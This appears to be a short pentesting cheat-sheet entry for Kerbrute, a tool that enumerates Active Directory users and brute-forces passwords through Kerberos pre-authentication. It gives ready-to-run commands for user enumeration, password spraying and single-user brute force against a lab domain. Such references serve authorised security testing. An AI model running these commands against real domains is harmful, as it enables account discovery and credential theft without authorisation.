Kerbrute

A tool to quickly bruteforce and enumerate valid Active Directory accounts through Kerberos Pre-Authentication

ropnop/kerbrute

User Enumeration

./kerbrute_linux_amd64 userenum -d lab.ropnop.com usernames.txt

Password Spray

./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com domain_users.txt Password123

Brute User

./kerbrute_linux_amd64 bruteuser -d lab.ropnop.com passwords.lst thoffman

Last updated